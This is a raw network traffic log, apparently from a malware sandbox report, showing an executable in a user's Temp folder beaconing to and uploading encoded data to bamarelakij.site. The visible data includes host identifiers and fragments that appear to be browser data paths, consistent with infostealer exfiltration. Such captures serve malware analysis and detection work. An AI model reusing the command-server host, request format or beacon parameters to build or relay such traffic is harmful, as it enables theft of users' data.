                                                                                                                                                                  15192.168.2.450061104.21.80.524438148C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:11 UTC352OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  Content-Length: 147
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:11 UTC147OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 60 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 f0 ae ad cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                                                  2025-01-06 22:18:11 UTC846INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:11 GMT
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BXjtQVVVTOylAI9c1JSsKN%2Brsh6XF4Y7MJVxm%2FeXmt3EAhp2CTEDOq%2F0tBrgbRD09WTcks3Ysg5Bk821UsC3sSjdaCGWTmP0iRWWS1XdW0WeGm38gFRyrxA1rr6p3eGkLPS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf151c4d8b6a5e-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1593&rtt_var=615&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1135&delivery_rate=1752701&cwnd=187&unsent_bytes=0&cid=4704f84e5ef89d1c&ts=1021&x=0"
                                                                                                                                                                  2025-01-06 22:18:11 UTC17INData Raw: 63 0d 0a f2 82 00 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                  Data Ascii: c
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 33 32 65 36 0d 0a e0 c7 0b 36 0e 00 7f 0e 86 0b 13 00 ec 0e 16 11 02 ec 08 7a 59 86 0b 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 20 00 96 09 05 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 05 0f 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e ab a7 ab 1b 1a 99 19 27 b7 32 b2 2e 2b b0 36 3b b2 2e a9 3a b2 b0 b6 04 00 ac 09 ce 02 0f 00 e4 0e 16 11 02 e4 04 34 59 ce 02 bc 58 d8 c3 49 7d 17 f0 0b 00 42 01 a9 05 13 00 ec 0e 16 11 02 ec 08 34 59 a9 05 65 9b b6 a7 b7 51 c9 59 28 39 b2 33 b2 39 b2 37 b1 b2 b9 04 00 c6 03 32 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 32 0c 65 fc e2 b9 9f d9 2d 8a 04 00 24 09 7a 0d 0f 00 e4 0e 16 11 02 e4 04 76 59 7a 0d f9 87 f9 1f 08 a2 36 2c 20 00 da 0c 94 00 13 00 ec 0e 16 11 02 ec 08 76 59 94 00 65 9b b6 a7 b7 51 c9
                                                                                                                                                                  Data Ascii: 32e66zYeQY199 >YeQY#*).'2.+6;.:4YXI}B4YeQY(93972rY2e-$zvYz6, vYeQ
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: a4 37 32 b2 3c b2 32 22 21 2e b1 34 39 b7 b6 b2 96 b2 3c 3a b2 37 b9 b4 b7 37 af b3 b7 35 34 b1 32 b3 b1 38 31 38 33 b4 b3 b1 b0 b2 35 38 33 34 33 b2 b3 b2 b5 32 b3 b4 31 36 b5 af 18 17 b4 37 32 b2 3c b2 32 32 31 17 36 b2 3b b2 36 32 31 01 00 ee 0c 76 0a 13 00 ec 0e 16 11 02 ec 08 ed 59 76 0a 65 9b b6 a7 b7 51 c9 59 05 08 00 3a 06 a4 0e 13 00 ec 0e 16 11 02 ec 08 73 59 a4 0e 65 9b b6 a7 b7 51 c9 59 b9 b2 3a 3a b4 37 b3 b9 0d 00 e8 0c c1 02 13 00 ec 0e 16 11 02 ec 08 76 59 c1 02 65 9b b6 a7 b7 51 c9 59 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 08 00 8a 03 eb 0b 13 00 ec 0e 16 11 02 ec 08 72 59 eb 0b 65 9b b6 a7 b7 51 c9 59 3a 3c 34 b4 37 3a b9 15 04 00 c7 0d 8c 0e 0f 00 e4 0e 16 11 02 e4 04 34 59 8c 0e 9e 1e b5 b8 6b 3b 7a 8b 04 00 cb 0a e2 03 0f 00 e4 0e 16
                                                                                                                                                                  Data Ascii: 72<2"!.49<:7754281835834321672<2216;621vYveQY:sYeQY::7vYeQY&6:9rYeQY:<47:4Yk;z
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 02 ec 08 76 59 fc 04 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 21 00 7f 04 05 0e 13 00 ec 0e 16 11 02 ec 08 34 59 05 0e 65 9b b6 a7 b7 51 c9 59 a7 ba 3a 36 b7 b7 b5 19 18 98 1b 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a7 ba 3a 36 b7 b7 b5 08 00 dc 03 6b 04 13 00 eb 0e 16 11 02 eb 08 9a 59 6b 04 fa 7c d0 f1 1d 72 d0 75 0b e2 4f 96 21 41 96 86 04 00 93 0c f6 0a 0f 00 e4 0e 16 11 02 e4 04 72 59 f6 0a 7b 34 35 38 8b 11 fa 0b 08 00 e1 06 36 03 13 00 eb 0e 16 11 02 eb 08 76 59 36 03 48 be bd a0 fa 4e 2a 71 b8 20 22 c7 c6 7d 6c 82 04 00 77 0e a6 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 a6 0c de 2d 81 4c 2f 08 4e 7f 19 00 c1 01 65 06 13 00 ec 0e 16 11 02 ec 08 73 59 65 06 65 9b b6 a7 b7 51 c9 59 b6 b2 b9 b9 b2 37 b3 b2 39 b9 2e 22 b4 b9 b1 b7 39 32 2e a1 b0
                                                                                                                                                                  Data Ascii: vYeQY8936!4YeQY:6.88":.&6.:6kYk|ruO!ArY{4586vY6HN*q "}lwrY-L/NesYeeQY79."92.
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 0f 00 e4 0e 16 11 02 e4 04 34 59 4c 09 70 89 a2 0d 81 ac 6d 3e 09 00 cc 05 88 07 13 00 ec 0e 16 11 02 ec 08 34 59 88 07 65 9b b6 a7 b7 51 c9 59 a4 37 32 b2 3c b2 32 22 21 0a 00 37 04 08 0e 13 00 ec 0e 16 11 02 ec 08 76 59 08 0e 65 9b b6 a7 b7 51 c9 59 b6 b9 b2 32 b3 b2 17 b2 3c b2 0b 00 ef 03 72 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 72 0f 65 9b b6 a7 b7 51 c9 59 15 b9 3a b2 b0 b6 15 17 b2 3c b2 11 00 fd 0b 46 03 13 00 ec 0e 16 11 02 ec 08 9a 59 46 03 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e 2a b4 b3 b2 39 2b 27 a1 11 00 9a 05 08 07 13 00 ec 0e 16 11 02 ec 08 76 59 08 07 65 9b b6 a7 b7 51 c9 59 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 08 00 74 0f fb 05 13 00 eb 0e 16 11 02 eb 08 34 59 fb 05 00 ab 5b 92 bc 4e 15 2c f5 35 c4 f5 80 7d 53 df
                                                                                                                                                                  Data Ascii: 4YLpm>4YeQY72<2"!7vYeQY2<r>YreQY:<FYFeQY#*).*9+'vYeQY49199t4Y[N,5}S
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 02 ec 08 ed 59 98 04 65 9b b6 a7 b7 51 c9 59 15 17 39 32 38 04 00 f5 0e e9 0a 0f 00 e4 0e 16 11 02 e4 04 76 59 e9 0a 2c 36 e8 17 dc f2 d2 21 0b 00 96 04 66 0e 13 00 ec 0e 16 11 02 ec 08 ed 59 66 0e 65 9b b6 a7 b7 51 c9 59 a0 37 bc 22 b2 b9 b5 17 b2 3c b2 08 00 1b 0f 85 0c 13 00 eb 0e 16 11 02 eb 08 d8 59 85 0c 42 e9 cd 96 64 55 b8 e2 b3 77 52 f1 58 66 fe 11 06 00 23 01 93 0f 13 00 ec 0e 16 11 02 ec 08 72 59 93 0f 65 9b b6 a7 b7 51 c9 59 a0 39 b6 b7 39 bc 04 00 fa 05 f8 04 0f 00 e4 0e 16 11 02 e4 04 61 59 f8 04 84 f8 45 7e 75 dd 8a 4d 08 00 68 0c ae 06 13 00 ec 0e 16 11 02 ec 08 5b 59 ae 06 65 9b b6 a7 b7 51 c9 59 28 b0 b9 b9 bb b7 39 32 04 00 31 0c 76 0f 0f 00 e4 0e 16 11 02 e4 04 34 59 76 0f 71 a1 31 f5 80 84 fe c6 07 00 b1 04 2e 08 13 00 ec 0e 16 11 02
                                                                                                                                                                  Data Ascii: YeQY928vY,6!fYfeQY7"<YBdUwRXf#rYeQY99aYE~uMh[YeQY(921v4Yvq1.
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 11 02 ec 08 34 59 33 0c 65 9b b6 a7 b7 51 c9 59 15 17 b9 b8 36 b4 3a b2 04 00 51 0a e1 09 0f 00 e4 0e 16 11 02 e4 04 73 59 e1 09 df f9 2c 2e 2f d8 e3 1d 04 00 71 0e b1 02 0f 00 e4 0e 16 11 02 e4 04 72 59 b1 02 45 2f 34 7f b7 0a fb 4c 06 00 91 0e f5 0b 13 00 ec 0e 16 11 02 ec 08 9a 59 f5 0b 65 9b b6 a7 b7 51 c9 59 2b b4 b2 bb b2 39 08 00 d8 0c 5a 0f 13 00 eb 0e 16 11 02 eb 08 9a 59 5a 0f c4 f8 d0 16 6d 6a 27 5c 35 66 4f 71 51 59 61 af 04 00 a2 0c 14 09 0f 00 e4 0e 16 11 02 e4 04 72 59 14 09 06 73 70 1d f6 b7 4a 2b 05 00 62 0f 01 01 13 00 ec 0e 16 11 02 ec 08 76 59 01 01 65 9b b6 a7 b7 51 c9 59 15 17 36 32 31 25 00 40 0e b7 04 13 00 ec 0e 16 11 02 ec 08 76 59 b7 04 65 9b b6 a7 b7 51 c9 59 a6 b4 b1 39 b7 b9 b7 33 3a 2e a2 32 b3 b2 2e a0 38 38 36 b4 b1 b0 3a
                                                                                                                                                                  Data Ascii: 4Y3eQY6:QsY,./qrYE/4LYeQY+9ZYZmj'\5fOqQYarYspJ+bvYeQY621%@vYeQY93:.2.886:
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 02 ec 08 34 59 d1 05 65 9b b6 a7 b7 51 c9 59 24 b4 b9 3a b7 39 bc 04 00 d2 0b 8a 0a 0f 00 e4 0e 16 11 02 e4 04 72 59 8a 0a 34 5e 90 bc c4 7b 5f 8f 08 00 a7 05 04 0f 13 00 eb 0e 16 11 02 eb 08 76 59 04 0f 95 12 0b 84 ba 02 75 3e b8 89 94 e3 86 31 33 cd 04 00 f5 03 34 05 0f 00 e4 0e 16 11 02 e4 04 72 59 34 05 69 42 1a 51 99 67 d5 62 08 00 25 07 5d 0e 13 00 eb 0e 16 11 02 eb 08 34 59 5d 0e 6a 12 61 4e 88 ae 7f b6 9b 8c fe 29 b4 9d 39 45 08 00 1e 03 e9 09 13 00 eb 0e 16 11 02 eb 08 9a 59 e9 09 dd d5 39 9b bd 27 28 fd 2c 4b a6 fc 81 14 6e 0e 04 00 10 07 74 0b 0f 00 e4 0e 16 11 02 e4 04 72 59 74 0b e6 76 8b fb 16 53 44 c8 04 00 c8 01 9f 01 0f 00 e4 0e 16 11 02 e4 04 72 59 9f 01 c7 17 73 5c 36 32 bc 6f 08 00 11 04 ce 00 13 00 eb 0e 16 11 02 eb 08 34 59 ce 00 be
                                                                                                                                                                  Data Ascii: 4YeQY$:9rY4^{_vYu>134rY4iBQgb%]4Y]jaN)9EY9'(,KntrYtvSDrYs\62o4Y
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 00 ec 0e 16 11 02 ec 08 34 59 04 03 65 9b b6 a7 b7 51 c9 59 a6 b4 b1 39 b7 b9 b7 33 3a 2e a7 ba 3a 36 b7 b7 b5 04 00 be 0b e8 09 0f 00 e4 0e 16 11 02 e4 04 76 59 e8 09 f8 a5 d3 7c 08 61 e9 4a 1d 00 66 09 02 08 13 00 ec 0e 16 11 02 ec 08 73 59 02 08 65 9b b6 a7 b7 51 c9 59 b6 b2 b9 b9 b2 37 b3 b2 39 b9 2e 22 b4 b9 b1 b7 39 32 2e a9 3a b0 31 36 b2 2e b5 b2 bc 04 00 47 06 a0 0f 0f 00 e4 0e 16 11 02 e4 04 34 59 a0 0f a5 f3 2d 12 54 d6 e2 21 04 00 ed 03 21 0f 0f 00 e4 0e 16 11 02 e4 04 72 59 21 0f f2 f7 51 80 02 d6 9e b3 24 00 51 0b 4f 0a 13 00 ec 0e 16 11 02 ec 08 76 59 4f 0a 65 9b b6 a7 b7 51 c9 59 a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e a0 38 38 36 b4 b1 b0 3a b4 b7 37 2e b1 34 39 b7 b6 b2 17 b2 3c b2 05 00 dd 0a f6 07 13 00 ec 0e 16 11 02 ec 08 34 59 f6
                                                                                                                                                                  Data Ascii: 4YeQY93:.:6vY|aJfsYeQY79."92.:16.G4Y-T!!rY!Q$QOvYOeQY6.49.886:7.49<4Y


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  16192.168.2.450073104.21.80.524438148C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:12 UTC453OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 53
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:12 UTC53OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  2025-01-06 22:18:13 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:13 GMT
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fno4derXhc4zCRBpAQauFsdm0k2IpBCA8fP%2Bvq8TCWlUt7MjsCJ8Y7BSxhh5cpq247gtMOWZaTQ4Fnv4N5ecSrPA0nm73smkVFYt8nEITHTd3jYo5DhRf8OrDEfjWDGbrEPf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf1526ecfa4370-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1611&rtt_var=616&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1142&delivery_rate=1760096&cwnd=231&unsent_bytes=0&cid=a2e710f028e4f247&ts=322&x=0"
                                                                                                                                                                  2025-01-06 22:18:13 UTC29INData Raw: 31 37 0d 0a 07 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 91 ce 2c 3d 05 b5 0d 0a
                                                                                                                                                                  Data Ascii: 17,=
                                                                                                                                                                  2025-01-06 22:18:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  17192.168.2.450111104.21.80.524438032C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:21 UTC457OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 106564
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:21 UTC15331OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 b9 49 01 00 08 00 00 00 52 00 00 00 fd 04 e9 09 95 a7 40 16 d7 35 c9 59 eb 01 00 00 00 00 00 00 00 00 00 00 fe 02 f4 84 c9 60 48 49 4c 60 48 53 a1 34 39 b7 b6 b2 ec 1a a1 1d 2e aa b9 b2 39 b9 2e 35 b7 37 b2 b9 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 c8 cc 60 48 d3 22 b2 33 b0 ba 36 3a ec 1e a1 1d 2e aa b9 b2 39 b9 2e 35 b7 37 b2 b9 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 2e 22 b2 33 b0 ba 36 3a ec 1a b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 2e a1 34 39 b7 b6 b2 2e 38 39 b7 33 b4 36 b2 b9 2e 22 b2 33 b0 ba 36 3a 2e 26 b7 b3 b4 37 10 22 b0 3a b0
                                                                                                                                                                  Data Ascii: IR@5Y`HIL`HS49.9.57.88":.&6.6.49.9":`H"36:.9.57.88":.&6.6.49.9":."36:49199.49.8936."36:.&7":
                                                                                                                                                                  2025-01-06 22:18:21 UTC15331OUTData Raw: de 5d 60 66 2d 42 f5 40 44 aa 2b f1 83 6b 82 be 02 fb 12 0e 0a b0 ae 1a 02 c9 7d eb bb 24 5f 21 36 1e 3d 95 74 6c 23 93 dc 4b ae ac 63 d8 2e 42 28 ec 3d 29 0b 22 4b 68 0d b0 34 65 2d 41 25 5e 58 a6 79 d6 ae 2b f5 0a ee 6f 1d 9a 1f 18 a6 ab ab 1b e1 92 62 7b 59 dd e9 5a 00 45 ff 88 6b 83 50 79 f7 cb 52 ec 46 0f 0c 1f c5 3a 05 90 28 6d 35 72 59 cc e6 c8 42 59 af 0f 23 1e 4b 31 a9 f4 05 bd 1e 31 d9 f5 0d 34 57 2f 63 7a c1 3d 25 09 b9 1e 68 e1 84 85 be a1 c7 96 07 27 7e d6 ce 84 af ae a8 f2 26 3c ba 5f a1 e4 78 f9 84 24 6e ee 9f 2c 3f f9 6d 56 47 2b ce b0 d3 83 28 24 6f 40 82 42 35 0e 8e 47 96 e1 2b c2 26 8d bc cb 7b ca a3 90 55 7b f0 8f e6 e0 6f e0 c1 34 b6 d1 3b b3 6b f2 14 b2 ad 80 90 87 3f 7b f1 a1 6e af c1 70 8c dd 78 3e b2 4a ba a8 72 42 03 31 e7 b1 34
                                                                                                                                                                  Data Ascii: ]`f-B@D+k}$_!6=tl#Kc.B(=)"Kh4e-A%^Xy+ob{YZEkPyRF:(m5rYBY#K114W/cz=%h'~&<_x$n,?mVG+($o@B5G+&{U{o4;k?{npx>JrB14
                                                                                                                                                                  2025-01-06 22:18:21 UTC15331OUTData Raw: a7 4e f7 1f 20 30 16 4c c3 95 72 68 fe c4 ac 50 e3 c7 d2 7b 2b aa 64 f2 25 00 11 e0 d7 46 92 c5 6d 54 8f 0e f4 54 da 53 36 af 94 2b a9 bf 63 7f 35 1f 1f e0 d8 33 bd e5 95 4e 2d 94 40 f6 35 00 b5 bf a5 de 93 03 1f 8a 5d e9 ca da 53 ca f7 3d 70 13 5c d5 a5 54 6e ba e9 b8 97 2a e1 35 64 1c a0 27 21 9c f5 c1 79 c0 83 94 66 e7 95 16 a5 d2 a0 96 ab d3 f9 24 52 9b 09 21 03 4a 27 e9 2c 3e 9d 7d 98 1e 93 93 77 b1 90 f8 51 9e 31 89 5f b5 74 bc 47 9f 43 bb 99 03 ee 68 f7 dc 7a ba a7 68 5b 3c 72 86 69 61 e3 1a 75 8e 49 63 e5 40 27 c4 fc f2 53 c3 27 f4 dc 2b de 20 1a bb c0 59 de 24 1e bb 1d d2 80 f3 20 14 05 ab 9e ed d6 f7 26 82 b8 10 a3 91 45 07 5b 76 67 aa 0a d8 52 9a bb 18 cd d1 da 1e d4 2f a7 ec 36 0a 80 cc b8 b9 6f 72 a1 8b f3 48 19 1b 13 c0 3e b8 45 c8 33 57 eb
                                                                                                                                                                  Data Ascii: N 0LrhP{+d%FmTTS6+c53N-@5]S=p\Tn*5d'!yf$R!J',>}wQ1_tGChzh[<riauIc@'S'+ Y$ &E[vgR/6orH>E3W
                                                                                                                                                                  2025-01-06 22:18:21 UTC15331OUTData Raw: d6 b6 63 d1 c3 cd 2d 8e c9 ea b1 c8 e8 28 52 90 f2 83 08 48 86 54 3c 24 9f 15 76 b3 9d 93 06 07 9a e6 c8 98 30 f8 48 3f 6c 0a 91 e7 ea d7 61 8a e9 80 38 38 55 b0 4f 46 80 47 87 76 d1 3d 1a 57 24 0d 07 18 52 45 7a 13 d8 29 57 19 62 9b 2e 1d a9 65 50 f8 3c 5c 13 9e 87 b8 49 6a 47 0b 42 4b fd 26 81 11 1b da 21 8f 87 b1 7c 65 e8 e1 93 ab e6 e4 da db 21 6a cd 1c 3e f8 cb 61 fe ff 77 64 c6 82 1d 92 74 c6 bc 11 e8 cd 61 0c 77 b9 3a 58 6c eb 39 de 8c 56 f0 3f 93 87 e5 3e 9a df 4b 7f 06 d0 9b 6b 44 42 8f 45 be dc e7 14 10 31 ae 95 7a f0 18 43 8b 0c 9e 1e 7b ea 1e ed 3d a5 42 ef c4 e1 38 bf e4 f9 82 1d 96 74 c6 b2 11 e8 dd 61 0c 4f f9 3a 58 5c 69 39 be 0d 56 f0 bd 93 87 93 be 9a 83 cb 7f 16 50 9b 5b 04 4e 8f 05 35 dc e7 19 10 31 33 96 7a 5d 58 43 ed 0d 1e 26 3b 4b
                                                                                                                                                                  Data Ascii: c-(RHT<$v0H?la88UOFGv=W$REz)Wb.eP<\IjGBK&!|e!j>awdtaw:Xl9V?>KkDBE1zC{=B8taO:X\i9VP[N513z]XC&;K
                                                                                                                                                                  2025-01-06 22:18:21 UTC15331OUTData Raw: b6 b1 3c 4e 89 a3 1f 60 96 59 e1 d6 64 db 5c a2 2b 96 16 22 f7 75 4e 74 86 df 68 d5 6c 34 c9 b6 35 c9 b6 5b 27 fb 7d de 8f 3d 99 49 05 a0 cc d9 e6 3b a4 12 06 ed e7 f7 0b c3 61 b5 f6 49 27 df 89 37 1f 2c dd a5 1d c8 8f a7 98 5d b5 c7 ef c4 db 6b 67 73 7d f0 c2 1f ff de a9 8c 18 84 6a d3 18 6e 93 c6 5b bd 4d 02 a7 b1 e9 9f 61 6f bc 49 74 34 5f 33 d2 d9 33 f1 4b b7 8f 26 21 62 98 4c a4 26 ee 8f 70 8c f9 e6 b0 e2 bf 6b 9e 37 92 96 3b 1b eb 87 95 51 a0 82 9b 49 45 10 d9 f1 d8 2a 84 a3 da 5f a7 a6 ec 27 2d 37 0e f5 1f d0 53 36 e3 26 ed 42 5b 6d a8 8f a7 6c 3f 72 f5 07 95 17 b3 03 88 11 16 de 37 29 cd 1c 41 19 a3 7a 6f f5 cc 7c ea 5f ea 99 1c 16 90 42 63 23 8a 2a 7c c3 d8 9f 8f a9 23 c7 23 ca 6c 39 87 00 60 18 68 8c cf 20 f3 ea 69 6d 3c d4 28 16 ca 45 e2 21 58
                                                                                                                                                                  Data Ascii: <N`Yd\+"uNthl45['}=I;aI'7,]kgs}jn[MaoIt4_33K&!bL&pk7;QIE*_'-7S6&B[ml?r7)Azo|_Bc#*|##l9`h im<(E!X
                                                                                                                                                                  2025-01-06 22:18:21 UTC15331OUTData Raw: bd 59 37 36 cf 1d 38 21 01 8c 59 be 77 23 65 2a 02 c1 49 d2 1f fe 32 4d cb ff 33 5b 81 06 75 f9 d7 cf 94 6f e4 c1 6d d4 dd da 8a 03 0f da c2 76 07 67 33 19 28 af 9c 5e e1 21 8c 87 c3 e6 5a 18 72 19 07 c9 fc 9e 43 92 b4 0b 3e 0d 5a 14 b9 31 bb 78 8a 31 e8 0e 4e 7c f7 fa 15 91 04 a2 bd 1e 2f 46 35 0b 0b 6f e0 99 d5 a2 04 fc 95 f2 44 fd 82 3b f2 f4 5d e0 e7 8e 6c ec 79 d1 4f 69 f5 79 aa 97 3e 77 2a ee 04 6b 07 2e 32 f0 a4 22 ac 37 b0 fe b9 5c ff 87 00 00 28 9e 0c ff 80 00 00 55 83 fc ff 80 00 00 55 83 eb ff 00 00 00 ea 99 a7 04 e8 7a f7 89 fe fd 25 90 00 00 00 5e bb 1e 7c 28 f6 72 c1 e4 df ff 8d 1e 43 79 76 85 a3 c9 f8 ff 83 22 ff c0 09 83 00 00 00 f7 92 87 6a 27 35 75 8b 40 c3 38 ff 8f 00 00 50 3d 78 f7 ff 00 00 00 55 83 eb ff 00 00 00 ea c1 f5 bf 00 00 40
                                                                                                                                                                  Data Ascii: Y768!Yw#e*I2M3[uomvg3(^!ZrC>Z1x1N|/F5oD;]lyOiy>w*k.2"7\(UUz%^|(rCyv"j'5u@8P=xU@
                                                                                                                                                                  2025-01-06 22:18:21 UTC14578OUTData Raw: 90 6a 10 7e 78 c5 f2 fd af 62 07 8c 73 11 a7 54 89 eb 3e f2 7e b6 df 59 52 b8 f3 6c 9d 5b 03 87 ec 5c 78 3c a1 ae c3 76 e1 f2 3b 49 f2 45 79 ee fa b9 d5 c7 67 18 2b ea df 7d be 21 10 88 39 f4 62 e7 f0 ac f1 c2 8c 76 fc ca ef 9e 95 6f b3 88 9a ba 6b de 07 2b 0d 8b cd 5e 18 85 f3 58 e9 95 7d cb 7b 7e be a1 aa df f8 19 f8 7e c2 72 ee 95 ac 5d fe 0e c1 3a 12 52 d0 fd 6e f6 e5 6b 66 1b a4 9a 07 c6 f7 4f e8 57 52 76 dc 5c 50 70 7e b0 d9 b6 8e 5c f0 be f5 93 9e cb 9f d6 6e 9c 33 a8 45 cf e7 12 79 a6 6f f2 e4 e3 5e a7 87 7c d6 3d 47 fc fc c5 c7 1b 9a 05 d5 b5 dd 23 b6 97 07 4f 3e 1b f3 77 c9 78 8b bb 87 23 96 77 b6 6a 08 58 de 7c f8 71 71 68 21 ab e4 b7 bb 77 d7 7b 2f a3 2e 45 55 75 94 ae 9e c2 dd 6b b9 3b d8 b4 6f 6d 7d db 93 ed 67 b8 b2 ea 56 7a 4f 2d 78 af 2e
